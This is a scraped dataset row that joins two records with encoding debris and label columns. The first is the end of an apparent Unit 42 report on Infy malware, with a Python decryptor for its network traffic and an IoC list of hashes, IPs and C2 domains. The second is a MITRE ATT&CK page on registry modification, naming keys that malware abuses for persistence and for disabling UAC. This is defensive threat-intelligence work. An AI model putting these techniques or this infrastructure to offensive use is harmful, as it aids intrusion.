chr(ord(letter)-1) \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 except: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 print ""sub_1_for_hex func problem"" \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 continue \xc2 \xc2 \xc2 \xc2 return str_output \xc2 def sum_comp_name(comp_name): \xc2 \xc2 \xc2 \xc2 sum = 0 \xc2 \xc2 \xc2 \xc2 for letter in comp_name: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 sum+= ord(letter) \xc2 \xc2 \xc2 \xc2 return sum \xc2 \xc2 \xc2 \xc2 def init_key(comp):\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 comp_name_sum = sum_comp_name(comp) \xc2 \xc2 \xc2 \xc2 carry = divmod(comp_name_sum, 62) \xc2 \xc2 \xc2 \xc2 index = carry[1] -1 \xc2 \xc2 \xc2 \xc2 end_key = FIRST_PHASE[:index] \xc2 \xc2 \xc2 \xc2 key = FIRST_PHASE[index:] \xc2 \xc2 \xc2 \xc2 key = key + end_key \xc2 \xc2 \xc2 \xc2 key = key + key \xc2 \xc2 \xc2 \xc2 return key \xc2 def decrypt(num_list,offset): \xc2 \xc2 \xc2 \xc2 global FULL_KEY \xc2 \xc2 \xc2 \xc2 input = """" \xc2 \xc2 \xc2 \xc2 for num_str in num_list: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 try: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 input += num_str.decode('hex') \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 except: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 input += ')'\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 result = """" \xc2 \xc2 \xc2 \xc2 for i, c in enumerate(input): \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 i = i % 62 +1 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 try: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 index = FULL_KEY.index(c)-1 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 except ValueError: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 result += c \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 continue \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 translated = SECOND_PHASE[(index - i +offset) % len(SECOND_PHASE)] \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 result += translated \xc2 \xc2 \xc2 \xc2 return result\xc2 \xc2 \xc2 def found_infy_enc_data(line):\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 found_infy_str = ""show=\\""---------- Administration Reporting Service "" \xc2 \xc2 \xc2 \xc2 found_infy_index = line.find(found_infy_str) \xc2 \xc2 \xc2 \xc2 if not found_infy_index==-1: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 return True,found_infy_index \xc2 \xc2 \xc2 \xc2 else: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 return False,found_infy_index def extract_comp_name(line): \xc2 \xc2 \xc2 \xc2 comp = r""\\xd\\xa-----"" \xc2 \xc2 \xc2 \xc2 comp_index = line.find(comp) \xc2 \xc2 \xc2 \xc2 comp_name = line[comp_index+len(comp):] \xc2 \xc2 \xc2 \xc2 comp_name = comp_name[:comp_name.find(""-----"")] \xc2 \xc2 \xc2 \xc2 print ""(((=)))"" + comp_name \xc2 \xc2 \xc2 \xc2 return comp_name \xc2 \xc2 \xc2 \xc2 def extract_enc_data(line): \xc2 \xc2 \xc2 \xc2 header = r""\\xd\\xa_____"" \xc2 \xc2 \xc2 \xc2 start_index = line.find(header)+len(header) \xc2 \xc2 \xc2 \xc2 line = line[start_index:] \xc2 \xc2 \xc2 \xc2 endindex = line.index(""_____\\"" value="") \xc2 \xc2 \xc2 \xc2 line = line[:endindex] \xc2 \xc2 \xc2 \xc2 return line \xc2 def write_enc_infy_data_to_file(dec_line,comp_name,filename):\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 file1 = open(filename + ""\\\\"" + comp_name + "".txt"",'ab') \xc2 \xc2 \xc2 \xc2 file1.writelines(dec_line) \xc2 \xc2 \xc2 \xc2 file1.close() \xc2 def enc_wrapper(enc,comp_name): \xc2 \xc2 \xc2 \xc2 global FULL_KEY \xc2 \xc2 \xc2 \xc2 print FULL_KEY \xc2 \xc2 \xc2 \xc2 FULL_KEY = init_key(comp_name) \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 enc_final = """" \xc2 \xc2 \xc2 \xc2 for letter in enc: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 if len(hex(ord(letter))[2:])==1: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 enc_final += ""0"" + hex(ord(letter))[2:]\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 elif len(hex(ord(letter))[2:])==2: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 enc_final += hex(ord(letter))[2:]\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 else: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 print ""not good hex length"" \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 exit() \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 enc = enc_final.upper() \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 enc = enc.replace(""2E"",""21"") \xc2 \xc2 \xc2 \xc2 enc = enc.replace(""C5DC5A"","""") \xc2 \xc2 \xc2 \xc2 enc = enc.replace(""D03D00"","""") \xc2 \xc2 \xc2 \xc2 enc = enc.replace(""0B0E"",""2121"")\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 enc = enc.replace(""01"",""21"") \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 enc_len = len(enc) \xc2 \xc2 \xc2 \xc2 \xc2 enc_rev = """" \xc2 \xc2 \xc2 \xc2 num_list = [] \xc2 \xc2 \xc2 \xc2 enc_print ="""" \xc2 \xc2 \xc2 \xc2 for i in range(0,enc_len/2): \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 enc_rev = enc[-2:] \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 if not enc_rev==""0B"" and not enc_rev==""0E"" and not enc_rev==""00"" and not enc_rev==""D0"": \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 enc_print +=enc_rev \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 num_list.append(enc_rev) \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 enc= enc[:-2] \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 #the first part is always ok \xc2 \xc2 \xc2 \xc2 dec_str = decrypt(num_list,0) \xc2 \xc2 \xc2 \xc2 final = sub_1_for_hex(dec_str) \xc2 \xc2 \xc2 \xc2 index = final.find(""OK: Sent"") \xc2 \xc2 \xc2 \xc2 if index==-1: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 print comp_name + "" - did not found OK: Sent !!!!\\n\\n\\n\\n"" \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 #exit() \xc2 \xc2 \xc2 \xc2 decrypt_data = comp_name + "" ++==++ "" +\xc2 \xc2 str(i) + "": "" + final + ""\\n"" \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 final_start = final[0:500] \xc2 \xc2 \xc2 \xc2 if final_start in UNIQUE_DATA: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 print comp_name + "" already have this data"" \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 return \xc2 \xc2 \xc2 \xc2 UNIQUE_DATA.append(final_start) \xc2 \xc2 \xc2 \xc2 index = final.find(""Installed Date:"") \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 if index==-1: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 for i in range(1,61): \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 dec_str = decrypt3(num_list,i) \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 final = sub_1_for_hex(dec_str) \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 ##print all 62 options \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 index2 = final.find(""PROGRAM START:"") \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 index3 = final.find(""Installed Date:"") \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 if not index2 ==-1 or not index3 ==-1: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 decrypt_data += str(i) + "": "" + final + ""\\n"" \xc2 \xc2 \xc2 \xc2 write_enc_infy_data_to_file(decrypt_data,comp_name,FILE_OUTPUT_NAME) \xc2 def read_enc_data_files(): \xc2 \xc2 \xc2 \xc2 \xc2 for root,dir,files in os.walk(PDML_PATH): \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 for file in files: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 filename = root+ ""\\\\"" + file \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 if os.path.isfile(filename): \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 print filename \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 for line in fileinput.input([filename]): \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 line = line.strip() \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 is_found,found_infy_index= found_infy_enc_data(line) \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 if not is_found: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 continue \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 line = line[found_infy_index:] \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 #get computer name (for use in init_key() later) \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 comp_name = extract_comp_name(line) \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 UNIQUE_COMP.append(comp_name) \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 #get the infy encrypted data \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 line = extract_enc_data(line) \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 #base64 decode enc_data \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 dec_line = line.decode('base64') \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 #append enc_data to file \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 write_enc_infy_data_to_file(dec_line,comp_name,FILE_ENC_OUTPUT_NAME) \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 enc_wrapper(dec_line,comp_name) try:\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 read_enc_data_files() except: \xc2 \xc2 \xc2 \xc2 print ""exception!!!!"" Appendix 2 \xe2\x80\x93IoCs Infy version 31: f07e85143e057ee565c25db2a9f36491102d4e526ffb02c83e580712ec00eb27 Infy \xe2\x80\x9cM\xe2\x80\x9d version 8.0: 583349B7A2385A1E8DE682A43351798CA113CBBB80686193ECF9A61E6942786A 5.9.94.34 138.201.0.134 138.201.47.150 144.76.250.205 138.201.47.158 138.201.47.153 us1s2[.]strangled[.]net uvps1[.]cotbm[.]com gstat[.]strangled[.]net secup[.]soon[.]it p208[.]ige[.]es lu[.]ige[.]es updateserver1[.]com updateserver3[.]com updatebox4[.]com bestupdateserver[.]com bestupdateserver2[.]com bestbox3[.]com safehostline[.]com youripinfo[.]com bestupser[.]awardspace[.]info box4035[.]net box4036[.]net box4037[.]net box4038[.]net box4039[.]net box4040[.]net box4041[.]net box4042[.]net box4043[.]net box4044[.]net box4045[.]net box4046[.]net box4047[.]net box4048[.]net box4049[.]net box4050[.]net box4051[.]net box4052[.]net box4053[.]net box4054[.]net box4055[.]net box4056[.]net box4057[.]net box4058[.]net box4059[.]net box4060[.]net box4061[.]net box4062[.]net box4063[.]net box4064[.]net box4065[.]net box4066[.]net box4067[.]net box4068[.]net box4069[.]net box4070[.]net box4071[.]net box4072[.]net box4075[.]net box4078[.]net box4079[.]net box4080[.]net box4081[.]net box4082[.]net box4083[.]net box4084[.]net box4085[.]net box4086[.]net box4087[.]net box4088[.]net box4089[.]net box4090[.]net Get updates from Palo Alto Networks! Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. Popular Resources Resource Center Blog Communities Tech Docs Unit 42 Sitemap Legal Notices Privacy Terms of Use Documents Account Manage Subscriptions \xc2 Report a Vulnerability \xc2\xa9 2019 Palo Alto Networks, Inc. All rights reserved.","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Modify Registry - Enterprise | MITRE ATT&CK\xe2\x84\xa2 Matrices Tactics PRE-ATT&CK Enterprise Mobile Techniques PRE-ATT&CK Enterprise Mobile Mitigations Enterprise Mobile Groups Software Resources General Information Getting Started ATT&CKcon Working with ATT&CK FAQ Updates Previous Versions Related Projects Blog\xc2 Contribute Register to stream ATT&CKcon 2.0 October 29-30 ENTERPRISE ENTERPRISE MOBILE PRE-ATT&CK TECHNIQUES All Initial Access Drive-by Compromise Exploit Public-Facing Application External Remote Services Hardware Additions Replication Through Removable Media Spearphishing Attachment Spearphishing Link Spearphishing via Service Supply Chain Compromise Trusted Relationship Valid Accounts Execution AppleScript CMSTP Command-Line Interface Compiled HTML File Control Panel Items Dynamic Data Exchange Execution through API Execution through Module Load Exploitation for Client Execution Graphical User Interface InstallUtil Launchctl Local Job Scheduling LSASS Driver Mshta PowerShell Regsvcs/Regasm Regsvr32 Rundll32 Scheduled Task Scripting Service Execution Signed Binary Proxy Execution Signed Script Proxy Execution Source Space after Filename Third-party Software Trap Trusted Developer Utilities User Execution Windows Management Instrumentation Windows Remote Management XSL Script Processing Persistence .bash_profile and .bashrc Accessibility Features Account Manipulation AppCert DLLs AppInit DLLs Application Shimming Authentication Package BITS Jobs Bootkit Browser Extensions Change Default File Association Component Firmware Component Object Model Hijacking Create Account DLL Search Order Hijacking Dylib Hijacking External Remote Services File System Permissions Weakness Hidden Files and Directories Hooking Hypervisor Image File Execution Options Injection Kernel Modules and Extensions Launch Agent Launch Daemon Launchctl LC_LOAD_DYLIB Addition Local Job Scheduling Login Item Logon Scripts LSASS Driver Modify Existing Service Netsh Helper DLL New Service Office Application Startup Path Interception Plist Modification Port Knocking Port Monitors Rc.common Re-opened Applications Redundant Access Registry Run Keys / Startup Folder Scheduled Task Screensaver Security Support Provider Service Registry Permissions Weakness Setuid and Setgid Shortcut Modification SIP and Trust Provider Hijacking Startup Items System Firmware Systemd Service Time Providers Trap Valid Accounts Web Shell Windows Management Instrumentation Event Subscription Winlogon Helper DLL Privilege Escalation Access Token Manipulation Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Bypass User Account Control DLL Search Order Hijacking Dylib Hijacking Exploitation for Privilege Escalation Extra Window Memory Injection File System Permissions Weakness Hooking Image File Execution Options Injection Launch Daemon New Service Path Interception Plist Modification Port Monitors Process Injection Scheduled Task Service Registry Permissions Weakness Setuid and Setgid SID-History Injection Startup Items Sudo Sudo Caching Valid Accounts Web Shell Defense Evasion Access Token Manipulation Binary Padding BITS Jobs Bypass User Account Control Clear Command History CMSTP Code Signing Compile After Delivery Compiled HTML File Component Firmware Component Object Model Hijacking Control Panel Items DCShadow Deobfuscate/Decode Files or Information Disabling Security Tools DLL Search Order Hijacking DLL Side-Loading Execution Guardrails Exploitation for Defense Evasion Extra Window Memory Injection File Deletion File Permissions Modification File System Logical Offsets Gatekeeper Bypass Group Policy Modification Hidden Files and Directories Hidden Users Hidden Window HISTCONTROL Image File Execution Options Injection Indicator Blocking Indicator Removal from Tools Indicator Removal on Host Indirect Command Execution Install Root Certificate InstallUtil Launchctl LC_MAIN Hijacking Masquerading Modify Registry Mshta Network Share Connection Removal NTFS File Attributes Obfuscated Files or Information Plist Modification Port Knocking Process Doppelg\xc3\xa4nging Process Hollowing Process Injection Redundant Access Regsvcs/Regasm Regsvr32 Rootkit Rundll32 Scripting Signed Binary Proxy Execution Signed Script Proxy Execution SIP and Trust Provider Hijacking Software Packing Space after Filename Template Injection Timestomp Trusted Developer Utilities Valid Accounts Virtualization/Sandbox Evasion Web Service XSL Script Processing Credential Access Account Manipulation Bash History Brute Force Credential Dumping Credentials in Files Credentials in Registry Exploitation for Credential Access Forced Authentication Hooking Input Capture Input Prompt Kerberoasting Keychain LLMNR/NBT-NS Poisoning and Relay Network Sniffing Password Filter DLL Private Keys Securityd Memory Two-Factor Authentication Interception Discovery Account Discovery Application Window Discovery Browser Bookmark Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Process Discovery Query Registry Remote System Discovery Security Software Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery Virtualization/Sandbox Evasion Lateral Movement AppleScript Application Deployment Software Distributed Component Object Model Exploitation of Remote Services Logon Scripts Pass the Hash Pass the Ticket Remote Desktop Protocol Remote File Copy Remote Services Replication Through Removable Media Shared Webroot SSH Hijacking Taint Shared Content Third-party Software Windows Admin Shares Windows Remote Management Collection Audio Capture Automated Collection Clipboard Data Data from Information Repositories Data from Local System Data from Network Shared Drive Data from Removable Media Data Staged Email Collection Input Capture Man in the Browser Screen Capture Video Capture Command and Control Commonly Used Port Communication Through Removable Media Connection Proxy Custom Command and Control Protocol Custom Cryptographic Protocol Data Encoding Data Obfuscation Domain Fronting Domain Generation Algorithms Fallback Channels Multi-hop Proxy Multi-Stage Channels Multiband Communication Multilayer Encryption Port Knocking Remote Access Tools Remote File Copy Standard Application Layer Protocol Standard Cryptographic Protocol Standard Non-Application Layer Protocol Uncommonly Used Port Web Service Exfiltration Automated Exfiltration Data Compressed Data Encrypted Data Transfer Size Limits Exfiltration Over Alternative Protocol Exfiltration Over Command and Control Channel Exfiltration Over Other Network Medium Exfiltration Over Physical Medium Scheduled Transfer Impact Data Destruction Data Encrypted for Impact Defacement Disk Content Wipe Disk Structure Wipe Endpoint Denial of Service Firmware Corruption Inhibit System Recovery Network Denial of Service Resource Hijacking Runtime Data Manipulation Service Stop Stored Data Manipulation Transmitted Data Manipulation Home Techniques Enterprise Modify Registry Modify Registry Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution. Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. [1] Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples). Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API. [2] Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. [3] [4] The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. [5] Often Valid Accounts are required, along with access to the remote system's Windows Admin Shares for RPC communication. ID:\xc2 T1112 Tactic: Defense Evasion Platform:\xc2 Windows Permissions Required:\xc2 User, Administrator, SYSTEM Data Sources:\xc2 Windows Registry, File monitoring, Process monitoring, Process command-line parameters, Windows event logs Defense Bypassed:\xc2 Host forensic analysis Contributors:\xc2 Bartosz Jerzman; Travis Smith, Tripwire; David Lu, Tripwire Version:\xc2 1.0 Mitigations Mitigation Description Restrict Registry Permissions Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation. Examples Name Description ADVSTORESHELL ADVSTORESHELL is capable of setting and deleting Registry values. [14] APT19 APT19 uses a Port 22 malware variant to modify several Registry keys. [54] APT32 APT32's backdoor has modified the Windows Registry to store the backdoor's configuration. [61] APT38 APT38 uses a tool called CLEANTOAD that has the capability to modify Registry keys. [56] BACKSPACE BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system. [8] BADCALL BADCALL modifies the firewall Registry key SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfileGloballyOpenPorts\\List. [11] Bankshot Bankshot writes data into the Registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Pniumj. [45] Cardinal RAT Cardinal RAT sets HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load to point to its executable. [37] Catchamas Catchamas creates three Registry keys to establish persistence by adding a New Service. [18] CHOPSTICK CHOPSTICK may store RC4 encrypted configuration information in the Windows Registry. [41] DarkComet DarkComet adds a Registry value for its installation routine to the Registry Key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System Enable LUA=\xe2\x80\x9d0\xe2\x80\x9d and HKEY_CURRENT_USER\\Software\\DC3_FEXEC. [34] [35] Dragonfly 2.0 Dragonfly 2.0 modified the Registry to perform multiple techniques through the use of Reg. [53] Exaramel Exaramel adds the configuration to the Registry in XML format. [36] FELIXROOT FELIXROOT deletes the Registry key HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open. [38] FIN8 FIN8 has deleted Registry keys during post compromise cleanup activities. [59] Gorgon Group Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\\Software\\Microsoft\\Office\\. [60] GreyEnergy GreyEnergy modifies conditions in the Registry and adds keys. [46] Honeybee Honeybee uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process. [57] HOPLIGHT HOPLIGHT has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system. [47] Hydraq Hydraq creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. Hydraq's backdoor also enables remote attackers to modify and delete subkeys. [22] [23] InvisiMole InvisiMole has a command to create, set, copy, or delete a specified Registry key or value. [24] KEYMARBLE KEYMARBLE has a command to create Registry entries for storing data under HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\WABE\\DataPath. [44] LoJax LoJax has modified the Registry key \xe2\x80\x98HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute\xe2\x80\x99 from \xe2\x80\x98autocheck autochk \xe2\x80\x99 to \xe2\x80\x98autocheck autoche \xe2\x80\x99. [52] Mosquito Mosquito stores configuration values under the Registry key HKCU\\Software\\Microsoft[dllname] and modifies Registry keys under HKCR\\CLSID...\\InprocServer32with a path to the launcher. [30] Naid Naid creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk. [43] NanoCore NanoCore has the capability to edit the Registry. [25] [26] Nerex Nerex creates a Registry subkey that registers a new service. [32] njRAT njRAT can create, delete, or modify a specified Registry key or value. [48] [49] Patchwork A Patchwork payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs. [58] PHOREAL PHOREAL is capable of manipulating the Registry. [19] PLAINTEE PLAINTEE uses reg add to add a Registry Run key for persistence. [12] PlugX PlugX has a module to create, delete, or modify Registry keys. [28] PoisonIvy PoisonIvy creates a Registry subkey that registers a new system device. [9] QUADAGENT QUADAGENT modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications. [13] QuasarRAT QuasarRAT has a command to edit the Registry on the victim\xe2\x80\x99s machine. [6] Reg Reg may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface. [1] Regin Regin appears to have functionality to modify remote Registry information. [21] Remcos Remcos has full control of the Registry, including the ability to modify it. [7] Rover Rover has functionality to remove Registry Run key persistence as a cleanup procedure. [20] RTM RTM can delete all Registry entries created during its execution. [33] Shamoon Once Shamoon has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy to 1. [39] [40] SOUNDBITE SOUNDBITE is capable of modifying the Registry. [19] StreamEx StreamEx has the ability to modify the Registry. [10] SynAck SynAck can manipulate Registry keys. [31] Threat Group-3390 A Threat Group-3390 tool can create a new Registry key under HKEY_CURRENT_USER\\Software\\Classes\\. [55] TrickBot TrickBot can modify registry entries. [27] Turla Turla has used the Registry to store encrypted payloads. [62] [63] TYPEFRAME TYPEFRAME can install 